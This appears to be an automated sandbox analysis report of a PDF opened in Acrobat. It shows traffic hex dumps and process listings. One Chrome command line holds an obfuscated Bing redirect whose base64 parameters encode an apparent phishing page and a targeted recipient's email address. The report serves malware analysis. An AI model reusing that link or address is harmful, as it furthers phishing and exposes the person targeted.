                                                    2024-07-04 19:06:04 UTC1369INData Raw: 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31
                                                    Data Ascii: .941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 1
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 36 38 34 20 31 33 34 2e 39 39 35 20 33 31 2e 35 37 39 35 20 31 33 39 2e 37 39 32 20 33 31 2e 35 37 39 35 43 31 34 34 2e 35 38 39 20 33 31 2e 35 37 39 35 20 31 34 38 2e 34 37 38 20 33 35 2e 34 36 38 34 20 31 34 38 2e 34 37 38 20 34 30 2e 32 36 35 36 43 31 34 38 2e 34 37 38 20 34 35 2e 30 36 32 37 20 31 34 34 2e 35 38 39 20 34 38 2e 39 35 31 36 20 31 33 39 2e 37 39 32 20 34 38 2e 39 35 31 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20
                                                    Data Ascii: 684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10"
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 32 2e 34 39 32 31 20 31 31 35 2e 36 38 20 34 31 2e 34 32 31 36 20 31 31 35 2e 36 38 20 34 30 2e 33 30 35 35 43 31 31 35 2e 36 37 38 20 33 39 2e 31 39 30 37 20 31 31 35 2e 32 33 34 20 33 38 2e 31 32 32 34 20 31 31 34 2e 34 34 35 20 33 37 2e 33 33 34 39 43 31 31 33 2e 36 35 36 20 33 36 2e 35 34 37 34 20 31 31 32 2e 35 38 36 20 33 36 2e 31 30 35 32 20 31 31 31 2e 34 37 32 20 33 36 2e 31 30 35 32 43 31 31 30 2e 33 35 38 20 33 36 2e 31 30 37 33 20 31 30 39 2e 32 39 31 20 33 36 2e 35 35 30 36 20 31 30 38 2e 35 30 34 20 33 37 2e 33 33 37 38 43 31 30 37 2e 37 31 37 20 33 38 2e 31 32 35 20 31 30 37 2e 32 37 34 20 33 39 2e 31 39 32 31 20 31 30 37 2e 32 37 31 20 34 30 2e 33 30 35 35 56 34 30 2e 33 30 35 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d
                                                    Data Ascii: 2.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill=
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 20 73 74 79 6c 65 3d 22 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30
                                                    Data Ascii: 44 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.0
                                                    2024-07-04 19:06:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 31 32 39 2e 38 35 32 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37
                                                    Data Ascii: d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.44977220.114.59.183443
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:25 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                    Host: slscr.update.microsoft.com
                                                    2024-07-04 19:06:25 UTC560INHTTP/1.1 200 OK
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Content-Type: application/octet-stream
                                                    Expires: -1
                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                    MS-CorrelationId: bdd78148-47d2-410d-af6d-7dec43e3d37d
                                                    MS-RequestId: b17dc688-9109-4f58-8266-c5f79e3b728a
                                                    MS-CV: DuKc35jALkaOZGXJ.0
                                                    X-Microsoft-SLSClientCache: 1440
                                                    Content-Disposition: attachment; filename=environment.cab
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 04 Jul 2024 19:06:24 GMT
                                                    Connection: close
                                                    Content-Length: 30005
                                                    2024-07-04 19:06:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                    2024-07-04 19:06:25 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:15:05:30
                                                    Start date:04/07/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\xJwSq336bs.pdf"
                                                    Imagebase:0x7ff6bc1b0000
                                                    File size:5'641'176 bytes
                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:15:05:30
                                                    Start date:04/07/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                    Imagebase:0x7ff74bb60000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:15:05:31
                                                    Start date:04/07/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1564,i,13095701672295818797,3944733196950927532,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                    Imagebase:0x7ff74bb60000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:15:05:55
                                                    Start date:04/07/2024
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://r%2eg%2eb%69ng%2ecom/bam/ac?!&&u=a1aHR0cHM6Ly9wdWItYWQ4YmRiYjMyMTY5NDkzNGE5YTIxOGVlYjY4Njg1NTkucjIuZGV2L2xpbmsuaHRtbCM&bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E="
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:15:05:55
                                                    Start date:04/07/2024
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2020,i,6328722041011328787,10411392948838012152,262144 /prefetch:8
                                                    Imagebase:0x7ff76e190000
                                                    File size:3'242'272 bytes
                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    No disassembly